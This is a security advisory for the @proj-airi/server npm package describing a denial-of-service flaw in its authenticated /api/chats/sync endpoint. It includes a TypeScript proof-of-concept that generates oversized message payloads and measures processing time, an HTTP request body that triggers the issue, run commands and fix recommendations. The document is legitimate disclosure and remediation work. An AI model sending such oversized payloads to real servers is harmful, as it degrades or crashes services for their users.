Skip to content

Resource exhaustion (DoS) of `/api/chats/sync` with authenticated unbounded payload

Moderate
nekomeowww published GHSA-h2xc-w722-j227 Mar 23, 2026

Package

npm @proj-airi/server (npm)

Affected versions

>= 0.8.2

Patched versions

0.8.5

Description

Summary (one paragraph)

@proj-airi exposes an authenticated endpoint POST /api/chats/sync that accepts a JSON body containing an unbounded messages array with unbounded content strings. The handler parses the full JSON body in memory and then performs per-message database reads/writes inside a transaction. An authenticated attacker can submit an oversized request (or many moderately large requests) to cause high CPU usage, high memory usage, and heavy database load, leading to denial of service (slowdown and/or OOM).

Vulnerability details

Root causes

  1. No request size limits in schema (valibot)
  • File: apps/server/src/api/chats.schema.ts
  • messages: array(ChatSyncMessageSchema) is unbounded.
  • content: string() is unbounded.
  • chat.id, chat.title, message.id are unbounded strings too.
  1. No server-side body size limit / streaming guard
  • File: apps/server/src/routes/chats.ts
  • The handler calls await c.req.json() and then validates, meaning the full payload must be read and parsed before rejection.
  1. Per-message DB lookup and write in a loop
  • File: apps/server/src/services/chats.ts
  • For each message, the service does a findFirst by message id and then an insert or update.
  • This makes processing (O(n)) database operations for (n) messages (and in practice can be worse depending on indexes/IO).

Proof of Concept

PoC A: in-repo script that exercises validation + DB writes

This PoC uses the current schema and the current syncChat implementation with an in-memory Postgres-compatible DB (PGlite) and demonstrates that large message batches cause significant server-side work.

import { performance } from 'node:perf_hooks'
import { createRequire } from 'node:module'

import { PGlite } from '@electric-sql/pglite'
import { vector } from '@electric-sql/pglite/vector'
import { sql } from 'drizzle-orm'
import { drizzle } from 'drizzle-orm/pglite'
import { safeParse } from 'valibot'

import { ChatSyncSchema } from '../api/chats.schema'
import * as chatSchema from '../schemas/chats'
import { createChatService } from '../services/chats'

function formatBytes(bytes: number) {
  const units = ['B', 'KB', 'MB', 'GB'] as const
  let value = bytes
  let unit = 0
  while (value >= 1024 && unit < units.length - 1) {
    value /= 1024
    unit += 1
  }
  return `${value.toFixed(2)} ${units[unit]}`
}

function makePayload(messageCount: number, contentBytes: number) {
  const content = 'A'.repeat(contentBytes)
  const createdAt = Date.now()

  return {
    chat: {
      id: 'poc-chat',
      type: 'group' as const,
      title: 'poc',
      createdAt,
      updatedAt: createdAt,
    },
    members: [
      { type: 'character' as const, characterId: 'default' },
    ],
    messages: Array.from({ length: messageCount }, (_, i) => ({
      id: `m-${i}`,
      role: 'user' as const,
      content,
      createdAt,
    })),
  }
}

async function createInMemoryDB(schema: Record<string, any>) {
  const require = createRequire(import.meta.url)
  // drizzle-kit is CJS; require() avoids ESM interop issues
  const { pushSchema } = require('drizzle-kit/api') as typeof import('drizzle-kit/api')

  const client = new PGlite({
    extensions: { vector },
  })

  const db = drizzle(client, { schema }) as any
  await db.execute(sql`CREATE EXTENSION IF NOT EXISTS vector;`)

  const { apply } = await pushSchema(schema, db)
  await apply()

  return db
}

async function main() {
  const messageCount = Number(process.env.MESSAGE_COUNT ?? '5000')
  const contentBytes = Number(process.env.CONTENT_BYTES ?? '2048')
  const userId = process.env.USER_ID ?? 'poc-user'

  console.log(JSON.stringify({ messageCount, contentBytes, totalContentApprox: formatBytes(messageCount * contentBytes) }))

  const payload = makePayload(messageCount, contentBytes)

  const mem0 = process.memoryUsage().heapUsed
  const t0 = performance.now()
  const parsed = safeParse(ChatSyncSchema, payload)
  const t1 = performance.now()
  const mem1 = process.memoryUsage().heapUsed

  if (!parsed.success) {
    console.error('Schema rejected payload:', parsed.issues)
    process.exitCode = 2
    return
  }

  console.log(`safeParse(ChatSyncSchema): ${(t1 - t0).toFixed(1)} ms, heap +${formatBytes(mem1 - mem0)}`)

  const db = await createInMemoryDB(chatSchema)
  const chatService = createChatService(db)

  const t2 = performance.now()
  const res = await chatService.syncChat(userId, parsed.output)
  const t3 = performance.now()

  console.log(`chatService.syncChat: ${(t3 - t2).toFixed(1)} ms, result: ${JSON.stringify(res)}`)
}

// eslint-disable-next-line antfu/no-top-level-await
await main()

Run:

# ~10 MiB total message content (5000 * 2048 bytes)
MESSAGE_COUNT=5000 CONTENT_BYTES=2048 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts

# ~20 MiB total message content (20000 * 1024 bytes)
MESSAGE_COUNT=20000 CONTENT_BYTES=1024 pnpm -C apps/server run apply:env -- tsx src/scripts/poc-chat-sync-dos.ts

Observed (representative) results on my machine:

  • MESSAGE_COUNT=5000, CONTENT_BYTES=2048syncChat ~ 2.2s
  • MESSAGE_COUNT=20000, CONTENT_BYTES=1024syncChat ~ 8.4s

In production (real network, JSON parsing overhead, real Postgres IO, concurrent requests) the impact will generally be worse.

PoC B: HTTP request shape (authenticated)

The HTTP body shape that triggers the issue:

{
  "chat": { "id": "any-string", "type": "group", "title": "optional", "createdAt": 0, "updatedAt": 0 },
  "members": [{ "type": "character", "characterId": "default" }],
  "messages": [
    { "id": "m-0", "role": "user", "content": "....very large....", "createdAt": 0 }
  ]
}

Increasing messages.length and messages[i].content.length increases server work and resource usage.

Recommendations / fixes

  • Enforce body size limits at the HTTP layer for /api/* (or at least /api/chats/sync). If using Hono, add a strict body size limit middleware before c.req.json().
  • Add schema bounds in ChatSyncSchema:
    • messages: maxSize(...) (e.g., 100–1000 depending on expected use)
    • content: maxLength(...) (e.g., 10k–100k)
    • id/title: maxLength(...)
  • Avoid per-message findFirst:
    • Use bulk upsert / batch insert.
    • Or prefetch existing IDs in a single query, then insert/update in batches.
  • Rate limit the endpoint by user/session and/or IP.
  • Consider quotas (e.g., max messages per chat per day, max bytes).

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CVE ID

No known CVE

Weaknesses

No CWEs

Credits